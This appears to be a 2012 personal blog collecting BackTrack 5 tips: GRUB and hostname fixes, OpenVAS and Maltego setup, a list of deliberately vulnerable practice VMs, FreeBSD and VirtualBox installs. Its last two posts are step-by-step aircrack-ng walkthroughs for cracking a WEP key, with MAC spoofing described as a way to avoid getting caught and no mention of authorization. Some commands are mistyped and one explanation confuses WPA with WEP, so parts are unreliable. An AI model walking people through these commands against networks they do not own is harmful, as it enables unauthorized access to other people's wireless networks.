Monday, 23 April 2012

Backtrack 5 - startx Gnome problem solved

This topic has been brought up many times. One of the many threads about it is this one: Black Screen afnstter Hard Disk Install and "startx"
there are many solution

The fix that works for me permanently is:
 Edit your grub file with:

 After installation of backtrack the screen go blank when startx command is    pressed so instead of typing startx type below code

Code:

     gedit /etc/default/grub

    Find this line in that file
    Code:

     GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset=1 vga=791"



    change that line to
    Code:

     GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i915.modeset=1 vga=791" 



    Save and close this file.
 dont forget  to update grub after changes type below command
    Code:

     update-grub

BACKTRACK ====> change host name

Open your terminal  in BACKTRACK

 Type in gedit /etc/hostname and press enter on your
 keyboard. type your name vishal and save







Type in gedit /etc/hostname and press enter on your
  keyboard. type your name vishal and save






















reboot and all  yu
have done

Backtrack 5 = Open Vulnerability Assessment System (OpenVAS)


The Open Vulnerability Assessment System (OpenVAS) is a framework of
several services and tools offering a comprehensive and powerful
vulnerability scanning and vulnerability management solution.




Installing OpenVAS 

The simplest way of installing all of required parts of the openvas suite is to issue the following commands in a terminal window.

root@bt:~#apt-get update
root@bt:~#apt-get install openvas
 Itbegins your openvas installation and update all the applications. When 
Openvas has been installed you can find it on Application --> 
Backtrack --> Vulnerability assessment --> vulnerability scanner 
--> Openvas . See the picture.
  
  
 
 
 
 
 
 
 
 
 
Openvas check setup openvas-check-setup is a very useful tool, 
here it is showing how it can help diagnose problems and give 
advice on how to fix them.



















Setting up OpenVAS 
 Step 1. Adding a user
From the menu, select Openvas Adduser and follow instructions
.
Openvas5.png
Note that you can use any username you like but in this case I have just used root.
I have left it at the default of password authentication as I am going to be using this
on a local machine and to save having to worry about the users having certs to worry
about,but this is entirely up to you. You cannot have an empty password so
I have used toor in this case. For the rules applied to this user I have left them blank
by pressing ctrl-d This means that this user will be able to perform any tasks
without any restrictions.

Step 2. Making the Certificate

From the menu, select Openvas mkcert and follow instructions.
Here we create the SSL cert This is used if you decided to use cert
instead of pass when you created the user, but you are required to
create it anyway even if you decide not to use certs.

Step 3. Syncing the NVT's

At this point we need to get the latest set of nvt's. These are what the scanner uses
to detect the vulnerabilities in what you are scanning. Please note you will need to
do this quite regularly, and the first time you do it could take a while depending
on the speed of your computer and internet.
So select OpenVAS NVT Sync from the menu

Step 4. Starting the scanner

Start Openvas scanner
Now we are ready to start the scanner
This WILL take a while the first time you start it as it checks and loads
the new NVT's you have downloaded in the previous step.

Openvas8.png

Openvas9.png
Note the time in the corner ! This was in a VM so it should be much quicker for you.
Subsequent starts will be quick unless you have not updated in quite some time
Please remember that the scanner runs as a daemon in the background and
will keep running until you reboot or stop it with the menu entry provided.

Step 5. Setup OpenVAS manager

Setting up openvas manager
First thing we need to do is make a client cert for Openvas manager,
This is done by running the following command
openvas-mkcert-client -n om -i
Openvas10.png
now we need to rebuild the database as it is now out of date with the added nvt's and we would otherwise get errors about the database. You should do this each time you update the NVT's. This is done with a simple command
openvasmd --rebuild
This process will only take a few seconds if using openvas-libraries version 4.0.3 or below.
This process can take much longer if using openvas-libraries version 4.0.5 or above. The tradeoff for this extra time is much greater scanning capabilities, so it is worth it.

Step 6. Setup OpenVAS Administrator

Setting up Openvas Administrator
We need to create an administrative user that we will be using to perform all
of our vulnerability assesments. This is done by running the following command
openvasad -c 'add_user' -n openvasadmin -r Admin
openvasadmin is the username I have chosen to become this user, you however
can substitute that with something better suited to you if you so choose.
Make sure you can remember this username and associated password as you
WILL need it when running openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin
Enter password: 
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file
provided, the new user will have no restrictions.
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin
has been successfully created.
root@bt:~# 

Starting OpenVAS Manager

Now we need to start Openvas Manager
This runs as a daemon in the background. As I am running everything
from my local machineI will be using localhost to listen on and in this
case the default port. This is done by running the following command.
openvasmd -p 9390 -a 127.0.0.1

Starting OpenVAS Administrator

Now we need to start Openvas Administrator
This also runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and in this case the default port. This is done by running the following command.
openvasad -a 127.0.0.1 -p 9393

Starting Greenbone Security Assistant

Now we need to start Greenbone security Assistant
This again runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and in this case the default port. This is done by running the following command.
gsad --http-only --listen=127.0.0.1 -p 9392
More info on the above commands and other options can be found by running their associated menu entry and by looking at the man pages. As all three of these run as a daemon and will continue running until you shutdown you computer, I have provided menu entries for you so as you can stop them when you no longer need them.


At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.

OpenVAS user interfaces

Greenbone security desktop

Now we need to start an application to enable you to communicate with the scanner and other daemons.
The first of these choices is greenbone security desktop
Start this from the menu item and fill in the credentials and details we created earlier, then click the login button.
Openvas11.png

Once logged in you can use this as your scanning interface, or use the next choice of you prefer.

Web interface

This next method is via a web interface
Open your favorite browser and enter the following address
127.0.0.1:9392
You will then be presented with a login page. login with the credentials we created earlier.
Once you have logged in, you will notice that your CPU usage will hit the roof, don't worry, this will return to normal in short while.
Openvas12.png
Here you can perform and setup all of your scanning tasks. It is a good idea to set NoScript to Temporarily allow 127.0.0.1 or you may get unexpected results.
There is much more to OpenVAS than I have included here, but this is only intended to get you up and running quickly. Scans and more advanced setups are beyond the scope of this simple tutorial. Don't forget about some of the other parts to openvas contained within the menu that I have not covered here and also the man pages.


Once you have completed the setup process

Starting OpenVAS with greenbone security desktop as the scanning interface

From the menu select
Openvas NVT sync
Start Openvas scanner
then in a terminal window
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Then from the menu
Start Greenbone Security Desktop
and login
You are now ready to setup your scanning tasks.

Starting OpenVAS with a web browser as the scanning interface

From the menu select
Openvas NVT sync
Start Openvas scanner
then in a terminal window
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Then open your browser to the address
http://127.0.0.1:9392
Login.
You are now ready to setup your scanning tasks.
after login you will see i have logged into it and started scanning my network 
showed a detail result of vulnerability high , medium , low below is the screenshot































vulnerability task completed with report

Maltego- All in one Information Gathering Tool

What is Maltego?
Maltego is an information gathering tool that allows
you to visually see relationships
.Maltego allows you to enumerate network and
domain information like:
Domain Names               
Whois Information
DNS Names
Netblocks
IP Address



  • Maltego also allows you to enumerate People information like:
  • Email addresses associated with a person's name
  • Web sites associated with a person's name
  • Phone numbers associated with a person's name
  • Social groups that are associated with a person's name
  • Companies and organizations associated with a person's name
Maltego also allows you to:
  • Do simple verification of email addresses
  • Search blogs for tags and phrases
  • Identify incoming links for websites
  • Extract metadata from files from target domains
What can Maltego do for you?
Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter. Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results.
If access to "hidden" information determines your success, Maltego can help you discover it
below is the pic  show the relation of information gathering of www.whatmobile.com.pk  and its relation
 

Pentest lab vulnerable servers list for practice


This list contain a set of  deliberately insecure LiveCDs, Virtual machines and applicarions designed to be used as targets for enumeration, web exploitation, password cracking and reverse  engineerin

UltimateLAMP
UltimateLAMP is a Ubuntu VM  running vulnerable services and containing weak accounts.
The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)
webgoat
WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
http://www.owasp.org

Holynix
Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.
http://pynstrom.net/index.php?page=holynix.php

WackoPicko
WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable
Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.
http://code.google.com/p/owaspbwa/

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity
LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
www.dvwa.co.uk

Hacking-Lab
This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.
http://www.hacking-lab.com/hl_livecd/

Moth
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
http://www.bonsai-sec.com/en/research/moth.php

Exploit kb vulnerable web app
exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques This is a fully functional web site with a content management system based on fckeditor. You can download it as source code or a pre configured.
http://sourceforge.net/projects/exploitcoilvuln/

Gruyere
This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution. To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
http://www.damnvulnerablelinux.org

pWnOS
pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points
http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html
http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab
A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats.
http://sourceforge.net/projects/virtualhacking/files/

Badstore
Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.
http://www.badstore.net/

BodgeIt Store
The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
http://code.google.com/p/bodgeit/

Hackademic Challenges
The OWASP Hackademic Challenges , is an open source project that can be used to test and improve one’s knowledge of information system and web application security. The OWASP Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker’s perspective.
www.hackademic.eu

OWASP Vicnum Project
A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ . Play the game at http://vicnum.ciphertechs.com

Stanford SecuriBench
Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.
http://suif.stanford.edu/~livshits/securibench/

Kioptrix =
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
http://www.kioptrix.com/blog/?page_id=135

hackxor
Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc
http://hackxor.sourceforge.net

Freebsd installation == gnome


 HELLO  friend                                             
after two days working on free bsd  i finally
installated gnome edition  i researched a lot
 hereit
  • Installing free bsd on vmware

Instead of showing in screenshot this link clear
installation of video freebsd installaton in vmware

http://www.youtube.com/watch?v=XZapR_-UGZ8


  • After installion in vmware you can add these two below packet from ftp or dvd

For dvd installtion  of package
#mount  /cdrom
#cd /cdrom/packages/All Packages you need
Name               Command
Xorgpkg_add -r xorg
Gnome 2.x.x  
pkg_add -r gnome2

  • After adding  packages you should  add these line in fstab

# ee /etc/fstab

/ dev/acd0      /cdrom         cd9568       ro, noauto      0       0

 proc              /proc            /procfs        rw                 0        0

 here only add above line proc  below /dev/acd0

  just save and quit

Lines to add in /etc/rc.conf

# em /etc/rc.conf
hald_enable="YES"
dbus_enable="YES"
gnome_enable="YES"
gdm_enable="YES"

add and just save and quit 
  • Installation of vmware driver

If you don't have /usr/ports on your disk, do this then. (this procedure takes some time)

portsnap fetch 
portsnap extract

cd /usr/ports/x11-drivers/xf86-video-vmware
make install clean
Thats all, vmware driver is now installed.
just reboot and login
type startx yu will see same
Below is the image of freebsd == gnome that i have installed in my vmware

VirtualBox on Backtrack 5

Following are listed below to install virtual box

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, edit /etc/apt/sources.list as shown below and download virtualbox

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0

Thursday, 12 April 2012PENTESTING ROUTER ATTACK RECONSTRUCTED = CRACKING CISCO-IOS PASSWORD

HI friends

BELOW IS MY DETAIL PAPER ON 
CRACKING CISCO-IOS PASSWORD
USING TOOLS
  1.  CHAIN AND ABEL
  2. PACKET TRACER,THE CISCO ROUTER(simulator)

VLC is not supposed to be run as root. Sorry. – Solution

Step 1. Open Terminal type -
                   apt-get install vlc && apt-get install vim-gnome

Step 2. Now Open VLC with gvim -
                   gvim /usr/bin/vlc

Step 3. Now use find  and replace for 'geteuid' and replace that with 'getppid'

Step 4. Now save that file.

Now you can run VLC .

Script for updating backtrack

Bt5up.py simple script that can help friends to improve
and update on BackTrack which is made by bl4ck5w4n  
(MaXFX) 
The following menu will be 
obtained from bt5up.py script:
 1. Update and clean Backtrack.

2. Exploit tools.
   - Metasploit Framework.
   - Exploit-db.
   - SET – Social Engineering Toolkit.
   - Update all.

3. Wireless & Telephony.
   - Aircrack-ng and Airdrop.
   - WarVox.
   - Giskismet.
   - Update all.

4. Web & Database.
   - W3AF.
   - Nikto.
   - Sqlmap.
   - Fimap.
   - JoomScan.
   - WPScan.
   - HexorBase.
   - Update all.

5. Others.
   - Nessus.
   - Wireshark
   - OpenVAS.
   - Nmap
   - Update all.

6. Update All
7. Update Script
8. Changelog
9. Feedback (Gmail)
10. Fix BT5 Bugs/Customize BT5
   - Startx after login
   - Change Login message(motd)
   - Set PulseAudio to autostart
   - Set Wicd autostart

11. Additional Tools
   - Nessus
   - Fern-Wifi-Cracker
   - Install All

install process =

Download script from dropbox link
 https://www.dropbox.com/sh/xnin8vpflsbggxf/dzJ_wOfMQA/Link%20to%20bt5up.py

root@bt:~# python bt5up.py
root@bt:~# cp bt5up.py /bin/bt5up
root@bt:~# chmod +x /bin/bt5up
root@bt:~# bt5up
 
greets = @octopurba 

Sunday, 22 April 2012

How to Crack a Wi-Fi Network’s WEP Password with BackTrack

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

Now it's time to pick your network. Run:
airodump-ng (interface)
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.

Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.

Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.



You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.


You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.



Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)
Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:
The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.

Hacking Wifi Network Using BackTrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack.

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
 
1
ifconfig
This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
 
1
airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range.
 
1
airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
 
1
macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
 
1
airmon-ng start [Wi-Fi Card name]
You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – “[Wi-Fi card name]” appears

DUMPING PACKETS

Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using following commands. On the command console type these commands -
 
1
airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
 
1
airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However packet dumping is quite a slow process, we need to speed up things to save our time. Open new console after the first data packet has been stored and type the command in the new console and execute it.
 
1
airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
 
1
aircrack-ng –n 64 –b [BSSID] [Filename without the extension]
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
 
1
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
 
1
2
3
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.